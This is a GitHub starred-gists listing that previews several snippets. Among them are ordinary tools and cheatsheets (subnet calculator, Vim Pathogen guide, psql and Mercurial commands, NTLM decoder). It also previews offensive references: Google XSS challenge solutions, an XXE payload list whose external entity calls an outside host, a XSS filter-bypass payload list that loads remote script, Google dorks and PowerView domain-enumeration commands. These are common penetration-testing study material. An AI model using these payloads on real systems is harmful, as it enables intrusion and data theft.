Skip to content

Instantly share code, notes, and snippets.

View hacks2learn's full-sized avatar

Marco hacks2learn

14 followers · 1 following
View GitHub Profile
@nboubakr
nboubakr / subnet.py
Created December 20, 2012 11:23
A simple python script converts a Classless Inter-Domain Routing (CIDR)-formatted IP address into an IP range and netmask.
#!/usr/bin/env python
# python subnet.py 200.100.33.65/26
import sys
# Get address string and CIDR string from command line
(addrString, cidrString) = sys.argv[1].split('/')
# Split address into octets and turn CIDR into int
addr = addrString.split('.')
@romainl
romainl / gist:9970697
Last active September 27, 2025 02:49
How to use Tim Pope's Pathogen

How to use Tim Pope’s Pathogen

I’ll assume you are on Linux or Mac OSX. For Windows, replace ~/.vim/ with $HOME\vimfiles\ and forward slashes with backward slashes.

The idea

Vim plugins can be single scripts or collections of specialized scripts that you are supposed to put in “standard” locations under your ~/.vim/ directory. Syntax scripts go into ~/.vim/syntax/, plugin scripts go into ~/.vim/plugin, documentation goes into ~/.vim/doc/ and so on. That design can lead to a messy config where it quickly becomes hard to manage your plugins.

This is not the place to explain the technicalities behind Pathogen but the basic concept is quite straightforward: each plugin lives in its own directory under ~/.vim/bundle/, where each directory simulates the standard structure of your ~/.vim/ directory.

@Kartones
Kartones / postgres-cheatsheet.md
Last active October 24, 2025 21:32
PostgreSQL command line cheatsheet

PSQL

Magic words:

psql -U postgres

Some interesting flags (to see all, use -h or --help depending on your psql version):

  • -E: will describe the underlaying queries of the \ commands (cool for learning!)
  • -l: psql will list all databases and then exit (useful if the user you connect with doesn't has a default database, like at AWS RDS)
@pbssubhash
pbssubhash / Google XSS challenge solutions..
Last active August 22, 2025 01:30
Solutions of the Google XSS Challenge..
Hey All,
I am P.B.Surya.Subhash, a 17 Year coder,hacker and a student.
Recently I happen to see so many posts regarding this " Google XSS Challenge " and i was fortunate enough to complete them..
These are the solutions for the challenges ;)
##############################################################################
Level 1: Hello, world of XSS
https://xss-game.appspot.com/level1/frame
query=<script>alert('xss')</script>
@staaldraad
staaldraad / XXE_payloads
Last active October 24, 2025 09:19
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@cortesben
cortesben / hg-commands.md
Last active July 1, 2025 13:48
Mercurial command cheat sheet

Mercurial Commands

Commands Description
hg pull get latest changes like git pull use flags like -u IDK why yet
hg add only for new files
hg commit add changes to commit with -m for message just like git
hg addremove adds new files and removes file not in your file system
hg incoming see changes commited by others
hg outgoing see local commits
@aseering
aseering / ntlmdecoder.py
Last active March 12, 2025 11:27
NTLM auth-string decoder
#!/usr/bin/env python
## Decodes NTLM "Authenticate" HTTP-Header blobs.
## Reads the raw blob from stdin; prints out the contained metadata.
## Supports (auto-detects) Type 1, Type 2, and Type 3 messages.
## Based on the excellent protocol description from:
## <http://davenport.sourceforge.net/ntlm.html>
## with additional detail subsequently added from the official protocol spec:
## <http://msdn.microsoft.com/en-us/library/cc236621.aspx>
##
@stevenswafford
stevenswafford / google-dorks
Created June 6, 2015 05:57
Listing of a number of useful Google dorks.
" _ _ "
" _ /|| . . ||\ _ "
" ( } \||D ' ' ' C||/ { % "
" | /\__,=_[_] ' . . ' [_]_=,__/\ |"
" |_\_ |----| |----| _/_|"
" | |/ | | | | \| |"
" | /_ | | | | _\ |"
It is all fun and games until someone gets hacked!
@HarmJ0y
HarmJ0y / PowerView-2.0-tricks.ps1
Last active May 18, 2025 13:19
PowerView-2.0 tips and tricks
# NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/)
# has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>
# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GoupName <GROUP> -Recurse
# get the effective set of users who can administer a server
@rvrsh3ll
rvrsh3ll / xxsfilterbypass.lst
Last active October 4, 2025 22:33
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>